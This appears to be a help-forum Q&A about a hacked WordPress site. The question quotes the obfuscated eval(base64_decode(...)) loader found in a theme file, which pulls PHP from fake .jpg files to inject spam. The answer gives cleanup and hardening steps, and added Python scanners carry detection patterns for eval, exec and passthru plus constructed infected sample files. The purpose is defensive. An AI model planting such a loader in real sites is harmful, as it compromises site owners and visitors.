Wordpress Site Keeps Getting Hacked


Problem description

I have a Wordpress site that keeps getting hacked. As far as I can tell the following changes are being made:

This file has some additional PHP code at the top:

wp-content/themes/enfold/functions.php

Like this:

eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));

and 4 new jpg files are being created:

/wp-includes/images/geo.jpg

/wp-includes/images/save.jpg

/wp-includes/images/magic.jpg

/wp-includes/images/links.jpg

These are not real jpg files as they don't open, but looking at them with a text editor reveals text and additional PHP code.

From looking at the PHP code it looks like it's trying to inject some spam/advertising links into my Wordpress POSTS.

I keep deleting these files, I've installed a security plugin, removed the admin login, changed all my passwords, but these files continue to get updated/created every few days.

I'm trying to understand how this is possible and what I need to do next to block this.
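As an added illustration (example code written here, not part of the question or the answer), the following Python triage helper decodes the loader line quoted above without executing it. The regexes and function names are mine; the base64 blob is the one from the question. Decoding it shows what that one line does: the payload defines a function, registers it with ob_start(), and inside it require()s the "image" under wp-includes/images/, so every page the theme renders passes through attacker-controlled PHP that merely carries a .jpg name. That is why the theme file and the fake images have to be treated as one infection rather than cleaned up separately.

```python
import base64
import re

# Matches the loader shape from the question: eval(base64_decode("<base64>")).
# Case-insensitive because PHP function names are; the quotes are optional
# because copy-pasted samples often lose them.
LOADER_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']?([A-Za-z0-9+/=]+)["\']?\s*\)\s*\)', re.I
)
# require/include targets inside a decoded payload (where the next stage lives)
REQUIRE_RE = re.compile(
    r'\b(?:require|include)(?:_once)?\s*\(?\s*["\']([^"\']+)["\']', re.I
)
# ob_start("name") registers a callback that rewrites all buffered page output
OB_CALLBACK_RE = re.compile(r'ob_start\s*\(\s*["\']\w+["\']\s*\)', re.I)

# The line quoted in the question (blob reproduced from the question as posted)
SAMPLE_LOADER = (
    'eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6'
    'L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9'
    'b2Jfc3RhcnQoImNhbGxiYWNrIik7"));'
)


def decode_loaders(php_source: str) -> list:
    """Decode every eval(base64_decode(...)) loader found in the given PHP text."""
    payloads = []
    for match in LOADER_RE.finditer(php_source):
        blob = match.group(1)
        blob += "=" * (-len(blob) % 4)  # samples from the wild often lose their '=' padding
        payloads.append(base64.b64decode(blob).decode("utf-8", errors="replace"))
    return payloads


def referenced_files(php_code: str) -> list:
    """Paths the payload require()s or include()s."""
    return REQUIRE_RE.findall(php_code)


def rewrites_output(php_code: str) -> bool:
    """True if the payload hooks the output buffer, which lets it alter every rendered page."""
    return OB_CALLBACK_RE.search(php_code) is not None


def triage(php_source: str = SAMPLE_LOADER) -> dict:
    """Summarise what a loader line does, without executing anything."""
    payloads = decode_loaders(php_source)
    return {
        "payloads": payloads,
        "next_stage_files": [f for p in payloads for f in referenced_files(p)],
        "hooks_output_buffer": any(rewrites_output(p) for p in payloads),
    }


if __name__ == "__main__":
    report = triage()
    for code in report["payloads"]:
        print("decoded payload:", code)
    print("next-stage files:", report["next_stage_files"])
    print("hooks output buffer:", report["hooks_output_buffer"])
```

Run it against the first few lines of any suspicious PHP file; a loader that names a file outside the theme, or that hooks ob_start(), is the lead to follow before deleting anything, because the referenced path tells you which other files belong to the same infection.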

Recommended answer

First - DON'T panic.

Installing antivirus or security plugins at this point will rarely help - the malicious code already has server access.

1 - Change ALL the passwords for FTP, mysql, DB, Cpanel, WHM, SSH (disable if not needed) etc. anything with access.

3 - Check your server (all folders like cgi, cgi-bin, ftp etc.). Delete all the wordpress folders (except wp-content), and all other strange files. Delete all themes and all plugins and check the rest of wp-content manually and attentively. Backup the DB and manually check it.

3.1 - (EDIT 1) - Disallow indexes in Cpanel / WHM. And read below for .htaccess protections.

2 - Upload new wordpress CORE files to their OWN directory (not root) and rename it to something else (not wp or wordpress).

3 - Update plugins and themes - do not copy the ones you have, but install fresh, updated ones from the wp plugin repository, and a fresh clean theme. Manually check if necessary.

In your theme, check all forms or input fields, and check for correct validation of input.

4 - Change all the DB passwords in the wp-config. All the hashes etc. Create a new database AND user AND new passwords. Manually check the DB backup BEFORE injecting it back.

4.1 - (EDIT I) I forgot to mention - change also the DB prefix. Do not leave wp.

5 - Change all wp user-passwords AND usernames. If you have an open site with hundreds of users then make a script to force everyone to change passwords. If you have only a dozen, change it manually. When I said all - it includes the default admin user (from past versions).

6 - After some time, check your server log, and see if the 404 messages for the fake image files are from a single IP address (probably not) - if they are - block it.

7 - There is not much more you can do, except being careful. It is a lot of work, but do not be lazy and follow all steps. Otherwise it is not just this one site, but the whole server that could be compromised. Again and again.

Guidelines for that not happening again:

  • Choose strong passwords. - We all dislike passwords that look like aDf34HG§*#sFGT, but they ARE helpful - especially on DB or other automated tasks. For users - force at least one symbol and one letter.

  • Do not install themes and plugins that you do not know, do not fully understand, or that you have downloaded from questionable sources (all-wp-premium-themes-for-free-and-direct-download-all-plugins-for-free etc).

  • Keep the wordpress core files updated.

.htaccess

Some directives that can prevent (or at least try to) this from happening again.

.htaccess file in the root directory of WordPress.

#Disallow indexes 
Options All -Indexes

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>

# WPhtC: Protect .htaccess file
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
</files>

robots.txt

Disallow: /wp-*

Another thing you can do is to force users (and yourself) to use SSL (HTTPS) when logging in to admin:

define('FORCE_SSL_LOGIN', true);

After that - you will also need to peek at your DB to see if there are strange columns / tables / entries / users. For example, if your site is constantly being redirected - check for strings etc. (eval(), exec() ..)

You could also use some of the numerous security plugins for core checksums and the other above-mentioned php calls.

There are other things, more complicated, especially on the APACHE side. If I have more time, I will post a blog entry and link it here. But the above is a good start.
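The manual checks in steps 3 and 6 of the answer, plus the DB-dump and core-checksum checks at the end, can be mechanised. The Python below is an added example written for this page, not the answerer's code and not a WordPress tool. It builds a constructed sample site in a temporary directory (the paths mirror the question, the file contents are made up) and then (a) flags files with an image extension but no image header, or with a PHP opening tag inside, which is the disguise the question describes; (b) lists the calls the answer names, eval(), base64_decode(), exec() and friends, in any text file or DB dump row; and (c) compares everything outside wp-content/ against a known-good checksum manifest, the way the core-checksum plugins do. Pointed at a real site root with a manifest for the matching WordPress release, scan_tree() and verify_core() produce a list of files to review by hand before the rebuild.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Leading bytes of real image formats. A ".jpg" that starts with anything else is
# not an image, which is exactly the disguise used by the files in the question.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# The calls the answer says to look for, in files and in the DB backup
SUSPICIOUS_RE = re.compile(
    r"\b(?P<call>eval|base64_decode|exec|shell_exec|system|passthru)\s*\("
    r"|(?P<ob>ob_start)\s*\(\s*[\"']\w+",
    re.I,
)


def is_fake_image(path: Path) -> bool:
    """Image extension but no image header."""
    signatures = IMAGE_MAGIC.get(path.suffix.lower())
    if signatures is None:
        return False
    with open(path, "rb") as fh:
        head = fh.read(8)
    return not any(head.startswith(sig) for sig in signatures)


def suspicious_calls(text: str) -> list:
    """Sorted, de-duplicated names of the dangerous calls present in the text."""
    return sorted({(m.group("call") or m.group("ob")).lower() for m in SUSPICIOUS_RE.finditer(text)})


def scan_tree(root: Path) -> list:
    """Walk a site tree and return (relative path, reason) pairs worth a manual look."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        if is_fake_image(path):
            findings.append((rel, "image extension but no image header"))
        if path.suffix.lower() in IMAGE_MAGIC and b"<?php" in data:
            findings.append((rel, "PHP opening tag inside an image file"))
        calls = suspicious_calls(data.decode("utf-8", errors="replace"))
        if calls:
            findings.append((rel, "contains " + ", ".join(calls)))
    return findings


def verify_core(root: Path, manifest: dict) -> dict:
    """Compare files outside wp-content/ to a known-good {relative path: sha256} manifest.
    wp-content/ is the site's own content and needs the manual review the answer describes."""
    modified, unexpected = [], []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if rel.startswith("wp-content/"):
            continue
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        if rel not in manifest:
            unexpected.append(rel)  # file an attacker dropped into core
        elif manifest[rel] != digest:
            modified.append(rel)  # core file that was edited
    return {"modified": sorted(modified), "unexpected": sorted(unexpected)}


# Constructed stand-ins for known-good core files (a real manifest comes from the release)
KNOWN_GOOD = {
    "wp-includes/version.php": "<?php\n$wp_version = '0.0-sample';\n",
    "wp-load.php": "<?php\nrequire_once __DIR__ . '/wp-config.php';\n",
}
# Constructed loader line in the shape from the question (the blob decodes to phpinfo();)
LOADER_LINE = 'eval(base64_decode("cGhwaW5mbygpOw=="));\n'
# Constructed DB backup row with an injected script, for the eval()/exec() string check
SAMPLE_DUMP_ROW = "INSERT INTO `wp_options` VALUES ('widget_text', '<script>eval(atob(\"Li4u\"))</script>');"


def build_sample_site(root: Path) -> None:
    """Constructed tree: clean core file, tampered core file, tampered theme, fake and real jpg, dropped file."""
    (root / "wp-includes" / "images").mkdir(parents=True)
    (root / "wp-content" / "themes" / "enfold").mkdir(parents=True)
    (root / "wp-content" / "uploads").mkdir(parents=True)
    (root / "wp-includes" / "version.php").write_text(KNOWN_GOOD["wp-includes/version.php"])
    (root / "wp-load.php").write_text(KNOWN_GOOD["wp-load.php"] + LOADER_LINE)
    (root / "wp-content" / "themes" / "enfold" / "functions.php").write_text(
        "<?php\n" + LOADER_LINE + "add_theme_support('post-thumbnails');\n")
    (root / "wp-includes" / "images" / "magic.jpg").write_text(
        "<?php echo '<a href=\"http://spam.example\">spam</a>';\n")
    (root / "wp-content" / "uploads" / "real.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 16)
    (root / "wp-includes" / "cache.php").write_text("<?php passthru('uptime');\n")


def demo() -> dict:
    """Build the sample tree in a temp dir and run all three checks on it."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    build_sample_site(root)
    manifest = {rel: hashlib.sha256(body.encode()).hexdigest() for rel, body in KNOWN_GOOD.items()}
    return {
        "findings": scan_tree(root),
        "core": verify_core(root, manifest),
        "dump_calls": suspicious_calls(SAMPLE_DUMP_ROW),
    }


if __name__ == "__main__":
    result = demo()
    for rel, reason in result["findings"]:
        print(f"{rel}: {reason}")
    print("core check:", result["core"])
    print("calls in DB dump row:", result["dump_calls"])
```

The header check is deliberately separate from the string check: a file that is not an image at all is suspicious regardless of what it contains, and a real image can still carry PHP appended after valid header bytes, which the `<?php` scan catches. The checksum comparison only covers files that exist in the manifest, so "unexpected" files (anything in core that the release does not ship) are reported on their own rather than silently passed.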
